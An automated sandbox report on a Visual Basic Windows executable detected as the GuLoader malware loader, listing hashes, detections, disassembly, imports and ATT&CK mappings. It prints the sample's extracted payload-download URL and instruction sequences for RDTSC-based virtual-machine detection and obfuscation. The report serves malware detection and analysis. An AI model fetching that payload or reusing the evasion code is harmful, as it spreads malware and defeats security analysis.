Play interactive tour

Edit tour

Windows Analysis Report G47wmLn8uy

Overview

General Information

Sample Name:	G47wmLn8uy (renamed file extension from none to exe)
Analysis ID:	539603
MD5:	9a1518ed709f916360e56b5ac7d76995
SHA1:	7c85312d66edf5b02ebd6c25cfe9c036a3471263
SHA256:	2a0878c196278384aab473c92977d236680c788b4e5ae0cc1f415a075a6fa9e2
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Tries to detect virtualization through RDTSC time measurements

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Uses 32bit PE files

Sample file is different than original file name gathered from version info

PE file contains strange resources

Contains functionality to read the PEB

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to call native functions

Contains functionality for execution timing, often used to detect debuggers

Abnormal high CPU Usage

Classification

Process Tree

System is w10x64

G47wmLn8uy.exe (PID: 6320 cmdline: "C:\Users\user\Desktop\G47wmLn8uy.exe" MD5: 9A1518ED709F916360E56B5AC7D76995)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1rvzmbX5uh5o/"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1190265703.0000000004D10000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000000.00000002.1190265703.0000000004D10000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1rvzmbX5uh5o/"}

Multi AV Scanner detection for submitted file

Show sources

Source: G47wmLn8uy.exe	Virustotal: Detection: 26%			Perma Link
Source: G47wmLn8uy.exe	ReversingLabs: Detection: 15%

Machine Learning detection for sample

Show sources

Source: G47wmLn8uy.exe

Joe Sandbox ML: detected

Source: G47wmLn8uy.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?export=download&id=1rvzmbX5uh5o/

Source: G47wmLn8uy.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: G47wmLn8uy.exe, 00000000.00000000.667550110.000000000042B000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameFort.exe vs G47wmLn8uy.exe
Source: G47wmLn8uy.exe, 00000000.00000002.1190054948.00000000020C0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameFort.exeFE2X vs G47wmLn8uy.exe
Source: G47wmLn8uy.exe	Binary or memory string: OriginalFilenameFort.exe vs G47wmLn8uy.exe

Source: G47wmLn8uy.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D1841D	0_2_04D1841D
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D1D38F	0_2_04D1D38F
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D104CA	0_2_04D104CA
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D18498	0_2_04D18498
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D1749D	0_2_04D1749D
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D1C4BD	0_2_04D1C4BD
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D1C45D	0_2_04D1C45D
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D18441	0_2_04D18441
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D105C3	0_2_04D105C3
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D165C9	0_2_04D165C9
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D16589	0_2_04D16589
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D10549	0_2_04D10549
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D1057D	0_2_04D1057D
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D10517	0_2_04D10517
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D1C509	0_2_04D1C509
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D136F8	0_2_04D136F8
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D1C66C	0_2_04D1C66C
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D1663D	0_2_04D1663D
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D16759	0_2_04D16759
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D1C70E	0_2_04D1C70E
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D160CA	0_2_04D160CA
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D160F6	0_2_04D160F6
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D19085	0_2_04D19085
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D1C052	0_2_04D1C052
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D1706B	0_2_04D1706B
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D16005	0_2_04D16005
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D18180	0_2_04D18180
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D1C2E9	0_2_04D1C2E9
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D18255	0_2_04D18255
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D1C259	0_2_04D1C259
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D16214	0_2_04D16214
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D1C226	0_2_04D1C226
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D1C3D1	0_2_04D1C3D1
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D163ED	0_2_04D163ED
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D1838C	0_2_04D1838C
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D1C37D	0_2_04D1C37D
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D1632E	0_2_04D1632E
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D16C93	0_2_04D16C93
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D17C39	0_2_04D17C39
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D16DC9	0_2_04D16DC9
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D16EE9	0_2_04D16EE9
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D15F92	0_2_04D15F92
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D16F8D	0_2_04D16F8D
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D168D1	0_2_04D168D1
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D169B1	0_2_04D169B1
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D159A7	0_2_04D159A7
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D189A8	0_2_04D189A8
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D16951	0_2_04D16951
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D1595B	0_2_04D1595B
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D18A90	0_2_04D18A90
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D16A75	0_2_04D16A75
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D18A15	0_2_04D18A15
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D18BD1	0_2_04D18BD1
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D15BF0	0_2_04D15BF0
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D15BB1	0_2_04D15BB1
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D18B59	0_2_04D18B59
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D16B4E	0_2_04D16B4E

Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D1841D NtAllocateVirtualMemory,	0_2_04D1841D
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D184D9 NtAllocateVirtualMemory,	0_2_04D184D9
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D18498 NtAllocateVirtualMemory,	0_2_04D18498
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D18441 NtAllocateVirtualMemory,	0_2_04D18441
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D18551 NtAllocateVirtualMemory,	0_2_04D18551
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D18663 NtAllocateVirtualMemory,	0_2_04D18663
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D18621 NtAllocateVirtualMemory,	0_2_04D18621
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D18255 NtAllocateVirtualMemory,	0_2_04D18255
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D1838C NtAllocateVirtualMemory,	0_2_04D1838C

Source: C:\Users\user\Desktop\G47wmLn8uy.exe

Process Stats: CPU usage > 98%

Source: G47wmLn8uy.exe	Virustotal: Detection: 26%
Source: G47wmLn8uy.exe	ReversingLabs: Detection: 15%

Source: G47wmLn8uy.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\G47wmLn8uy.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\G47wmLn8uy.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\Desktop\G47wmLn8uy.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\G47wmLn8uy.exe

File created: C:\Users\user\AppData\Local\Temp\~DFAFA5F207726209AF.TMP

Jump to behavior

Source: classification engine

Classification label: mal76.troj.evad.winEXE@1/1@0/0

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000000.00000002.1190265703.0000000004D10000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_00406471 push edi; iretd	0_2_00406472
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_00409011 push esp; retf	0_2_00409013
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_0040682F push esi; retf	0_2_00406830
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_0040A490 push ds; iretd	0_2_0040A491
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_004079F6 push eax; retf	0_2_00407A10
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_004055BF push ds; ret	0_2_004055D9
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_00405ECC push ebp; ret	0_2_00405ED8
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_00407F27 push edi; ret	0_2_00407F28
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_00407FBA push eax; iretd	0_2_00407FBB
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D1747D pushfd ; iretd	0_2_04D19C58
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D17404 pushfd ; iretd	0_2_04D19C58
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D100CA push 5D54C3DCh; ret	0_2_04D10116
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D19157 push E8BBB633h; retf 001Bh	0_2_04D1915F
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D14344 push 8122E3ECh; ret	0_2_04D14349
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D17371 pushfd ; iretd	0_2_04D19C58
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D17368 pushfd ; iretd	0_2_04D19C58
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D11F01 push esi; ret	0_2_04D11F02
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D19B93 pushfd ; iretd	0_2_04D19C58

Source: initial sample

Static PE information: section name: .text entropy: 7.15645216813

Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\G47wmLn8uy.exe

RDTSC instruction interceptor: First address: 0000000004D17C16 second address: 0000000004D17C16 instructions: 0x00000000 rdtsc 0x00000002 mov eax, B4901491h 0x00000007 sub eax, 05E3F0C7h 0x0000000c xor eax, 8F9A272Fh 0x00000011 sub eax, 213604E4h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007F65F4CB431Dh 0x0000001e lfence 0x00000021 mov edx, 238EE826h 0x00000026 sub edx, 0388C43Eh 0x0000002c xor edx, E448541Bh 0x00000032 xor edx, BBB077E7h 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d ret 0x0000003e sub edx, esi 0x00000040 ret 0x00000041 pop ecx 0x00000042 add edi, edx 0x00000044 dec ecx 0x00000045 mov dword ptr [ebp+00000229h], AD8B339Ah 0x0000004f xor dword ptr [ebp+00000229h], 22419229h 0x00000059 xor dword ptr [ebp+00000229h], 3996C157h 0x00000063 sub dword ptr [ebp+00000229h], B65C60E4h 0x0000006d cmp ecx, dword ptr [ebp+00000229h] 0x00000073 jne 00007F65F4CB4237h 0x00000075 cmp cx, ax 0x00000078 mov dword ptr [ebp+0000020Bh], ebx 0x0000007e mov ebx, ecx 0x00000080 push ebx 0x00000081 mov ebx, dword ptr [ebp+0000020Bh] 0x00000087 jmp 00007F65F4CB42DEh 0x00000089 cmp dl, bl 0x0000008b call 00007F65F4CB4321h 0x00000090 call 00007F65F4CB433Eh 0x00000095 lfence 0x00000098 mov edx, 238EE826h 0x0000009d sub edx, 0388C43Eh 0x000000a3 xor edx, E448541Bh 0x000000a9 xor edx, BBB077E7h 0x000000af mov edx, dword ptr [edx] 0x000000b1 lfence 0x000000b4 ret 0x000000b5 mov esi, edx 0x000000b7 pushad 0x000000b8 rdtsc

Source: C:\Users\user\Desktop\G47wmLn8uy.exe

Code function: 0_2_04D17C0E rdtsc

0_2_04D17C0E

Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D1B2F5 mov eax, dword ptr fs:[00000030h]	0_2_04D1B2F5
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D1C259 mov eax, dword ptr fs:[00000030h]	0_2_04D1C259
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D1C226 mov eax, dword ptr fs:[00000030h]	0_2_04D1C226
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D1ACF0 mov eax, dword ptr fs:[00000030h]	0_2_04D1ACF0
Source: C:\Users\user\Desktop\G47wmLn8uy.exe	Code function: 0_2_04D17A41 mov eax, dword ptr fs:[00000030h]	0_2_04D17A41

Source: C:\Users\user\Desktop\G47wmLn8uy.exe

Code function: 0_2_04D17C0E rdtsc

0_2_04D17C0E

Source: C:\Users\user\Desktop\G47wmLn8uy.exe

Code function: 0_2_04D1D38F RtlAddVectoredExceptionHandler,

0_2_04D1D38F

Source: G47wmLn8uy.exe, 00000000.00000002.1189999307.0000000000C40000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: G47wmLn8uy.exe, 00000000.00000002.1189999307.0000000000C40000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: G47wmLn8uy.exe, 00000000.00000002.1189999307.0000000000C40000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: G47wmLn8uy.exe, 00000000.00000002.1189999307.0000000000C40000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection1	Software Packing1	OS Credential Dumping	Security Software Discovery11	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection1	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information2	Security Account Manager	System Information Discovery11	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Link
G47wmLn8uy.exe	27%	Virustotal	Browse
G47wmLn8uy.exe	16%	ReversingLabs
G47wmLn8uy.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	539603
Start date:	14.12.2021
Start time:	15:54:22
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	G47wmLn8uy (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.troj.evad.winEXE@1/1@0/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 7.8% (good quality ratio 5%) Quality average: 37.9% Quality standard deviation: 33.2%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for sample files taking high CPU consumption
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 2.20.205.141 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\~DFAFA5F207726209AF.TMP Download File
Process:	C:\Users\user\Desktop\G47wmLn8uy.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.9730200708513237
Encrypted:	false
SSDEEP:	24:r/hDKifA3RuOH/3+aVR4J5lBefVYyDnKoKgQBX2:rJKifAhx5853weyDKoKgQB
MD5:	E8C98D07896778A7A68D9895386FC8A0
SHA1:	734F506C412CAFA5BF6680E7C1EBBE939CE63773
SHA-256:	DCEDB0D3B75126360C0556DC3310ACBBB97ADAD114F518DF8C65E84C0E6BED51
SHA-512:	A48737384CACB83CDB77F1CD5CCD89EB50E5CB48C7F6A41E2EC91093A4B4E6A634B0CCF85C39B4DC49D6C0B4D3D2DEF69FF002FCD96D0CC9EA8AFADF47E6F14F
Malicious:	false
Reputation:	low
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.9046699069840765
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	G47wmLn8uy.exe
File size:	167936
MD5:	9a1518ed709f916360e56b5ac7d76995
SHA1:	7c85312d66edf5b02ebd6c25cfe9c036a3471263
SHA256:	2a0878c196278384aab473c92977d236680c788b4e5ae0cc1f415a075a6fa9e2
SHA512:	8f99b5b19d72548340c8bfc3ce6460d73c055b556daa956739cdeb67c2d0db56688e9f017deb2a94f29a298da959d479f3c8dc20123eac6762c69103cd004b13
SSDEEP:	1536:FrdvP8OOzT80mFxgs0HtyWPK0xljCwioDoWjJNa+I37KTqPRzV5pkNXuUAnq:ddvP81zTGUjKWMoDhjJNS7hPHUAnq
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.x.....................\.......%.......Rich............................PE..L.....pV.................`...P......\........p....@

File Icon


Icon Hash:	937160c0d2e4f9fb

Static PE Info

General
Entrypoint:	0x40195c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x567083E4 [Tue Dec 15 21:19:32 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	e7597de960f525af7c9e8aa5873fcec3

Entrypoint Preview

Instruction
push 00402000h
call 00007F65F4FE1115h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
cmp byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or al, 53h
into
push ebp
sub ah, ch
push ds
inc esp
xchg eax, esi
mov al, byte ptr [E7FEEB99h]
arpl word ptr [ebx+00000000h], bx
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push ebx
inc ebp
dec ebp
dec ecx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
or byte ptr [eax-73h], dh
insb
xchg eax, ebx
rcpps xmm3, dqword ptr [CBA58348h]
sub eax, 9CA7CE77h
mov ebp, C69ABAB7h
mov esp, dword ptr [ebp+4Ch]
mov byte ptr [CC5C4C4Dh], al
or al, byte ptr [esi+69h]
cmp cl, byte ptr [edi-53h]
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
stc
add eax, 04C50000h
add byte ptr [eax], al
add byte ptr [esi], al
add byte ptr [ebp+4Eh], dl
inc esp
inc ebp
push edx
dec eax
add byte ptr [53000401h], cl
je 00007F65F4FE1187h
je 00007F65F4FE1122h
sbb dword ptr [ecx], eax
add byte ptr [edx+00h], al
and eax, dword ptr [esi+6C000004h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x26414	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2b000	0x850	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x238	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x24c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x25ba0	0x26000	False	0.558850740132	data	7.15645216813	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x27000	0x36e4	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x2b000	0x850	0x1000	False	0.322265625	data	3.08403187378	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x2b3e8	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x2b3d4	0x14	data
RT_VERSION	0x2b0f0	0x2e4	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

__vbaVarSub, __vbaR8FixI4, _CIcos, _adj_fptan, __vbaStrI4, __vbaVarMove, __vbaHresultCheck, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, _adj_fdiv_m64, _adj_fprem1, __vbaStrCat, __vbaHresultCheckObj, __vbaLenBstrB, __vbaLenVar, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFPFix, __vbaFpR8, _CIsin, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaGet3, __vbaStrCmp, __vbaAryConstruct2, __vbaVarTstEq, __vbaI2I4, __vbaObjVar, __vbaStrR4, _adj_fpatan, __vbaRedim, __vbaStrR8, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaUbound, __vbaVarCat, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaInStr, __vbaNew2, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, 